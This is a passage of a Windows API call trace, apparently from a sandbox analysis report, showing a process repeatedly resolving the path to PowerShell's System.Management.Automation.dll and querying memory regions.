lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.895] GetLastError () returned 0x0 [0026.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.895] GetLastError () returned 0x0 [0026.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.895] GetLastError () returned 0x0 [0026.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.895] GetLastError () returned 0x0 [0026.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.895] GetLastError () returned 0x0 [0026.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.895] GetLastError () returned 0x0 [0026.895] VirtualQuery (in: lpAddress=0x1cd0f4, lpBuffer=0x1ce0f4, dwLength=0x1c | out: lpBuffer=0x1ce0f4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdae8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.896] GetLastError () returned 0x0 [0026.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.896] GetLastError () returned 0x0 [0026.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.896] GetLastError () returned 0x0 [0026.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.896] GetLastError () returned 0x0 [0026.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.896] GetLastError () returned 0x0 [0026.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.896] GetLastError () returned 0x0 [0026.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.896] GetLastError () returned 0x0 [0026.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.896] GetLastError () returned 0x0 [0026.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.896] GetLastError () returned 0x0 [0026.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.896] GetLastError () returned 0x0 [0026.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.896] GetLastError () returned 0x0 [0026.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.896] GetLastError () returned 0x0 [0026.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.896] GetLastError () returned 0x0 [0026.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.897] GetLastError () returned 0x0 [0026.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.897] GetLastError () returned 0x0 [0026.897] VirtualQuery (in: lpAddress=0x1cd0f4, lpBuffer=0x1ce0f4, dwLength=0x1c | out: lpBuffer=0x1ce0f4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdae8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.897] GetLastError () returned 0x0 [0026.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.897] GetLastError () returned 0x0 [0026.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.897] GetLastError () returned 0x0 [0026.897] VirtualQuery (in: lpAddress=0x1cd0f4, lpBuffer=0x1ce0f4, dwLength=0x1c | out: lpBuffer=0x1ce0f4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.897] GetLastError () returned 0x0 [0026.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.897] GetLastError () returned 0x0 [0026.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.898] GetLastError () returned 0x0 [0026.898] VirtualQuery (in: lpAddress=0x1ccd24, lpBuffer=0x1cdd24, dwLength=0x1c | out: lpBuffer=0x1cdd24*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.898] VirtualQuery (in: lpAddress=0x1ccd60, lpBuffer=0x1cdd60, dwLength=0x1c | out: lpBuffer=0x1cdd60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.898] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.898] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.899] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.899] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.899] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.899] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.899] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.899] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.900] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.900] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.900] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.900] VirtualQuery (in: lpAddress=0x1ccecc, lpBuffer=0x1cdecc, dwLength=0x1c | out: lpBuffer=0x1cdecc*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.900] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.901] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.901] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.901] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.901] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x2cd922cf, Data2=0x29de, Data3=0x4158, Data4=([0]=0xa0, [1]=0xb, [2]=0x84, [3]=0xf4, [4]=0xd2, [5]=0x6, [6]=0xda, [7]=0xc9))) returned 0x0 [0026.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.901] GetLastError () returned 0x0 [0026.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.902] GetLastError () returned 0x0 [0026.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.902] GetLastError () returned 0x0 [0026.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.902] GetLastError () returned 0x0 [0026.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.902] GetLastError () returned 0x0 [0026.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.902] GetLastError () returned 0x0 [0026.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.902] GetLastError () returned 0x0 [0026.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.902] GetLastError () returned 0x0 [0026.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.902] GetLastError () returned 0x0 [0026.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.902] GetLastError () returned 0x0 [0026.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.902] GetLastError () returned 0x0 [0026.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.902] GetLastError () returned 0x0 [0026.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.902] GetLastError () returned 0x0 [0026.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.903] GetLastError () returned 0x0 [0026.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.903] GetLastError () returned 0x0 [0026.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.903] GetLastError () returned 0x0 [0026.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.903] GetLastError () returned 0x0 [0026.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.903] GetLastError () returned 0x0 [0026.903] GetLastError () returned 0x0 [0026.903] GetLastError () returned 0x0 [0026.903] GetLastError () returned 0x0 [0026.903] GetLastError () returned 0x0 [0026.903] GetLastError () returned 0x0 [0026.903] GetLastError () returned 0x0 [0026.903] GetLastError () returned 0x0 [0026.903] GetLastError () returned 0x0 [0026.903] GetLastError () returned 0x0 [0026.904] VirtualQuery (in: lpAddress=0x1ccd24, lpBuffer=0x1cdd24, dwLength=0x1c | out: lpBuffer=0x1cdd24*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.904] VirtualQuery (in: lpAddress=0x1ccd60, lpBuffer=0x1cdd60, dwLength=0x1c | out: lpBuffer=0x1cdd60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.904] GetLastError () returned 0x0 [0026.904] GetLastError () returned 0x0 [0026.904] GetLastError () returned 0x0 [0026.904] VirtualQuery (in: lpAddress=0x1cce2c, lpBuffer=0x1cde2c, dwLength=0x1c | out: lpBuffer=0x1cde2c*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.905] GetLastError () returned 0x0 [0026.905] GetLastError () returned 0x0 [0026.905] GetLastError () returned 0x0 [0026.905] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x5aa851b1, Data2=0x1936, Data3=0x4fc4, Data4=([0]=0x8c, [1]=0x35, [2]=0xb6, [3]=0x49, [4]=0x88, [5]=0x2e, [6]=0xe2, 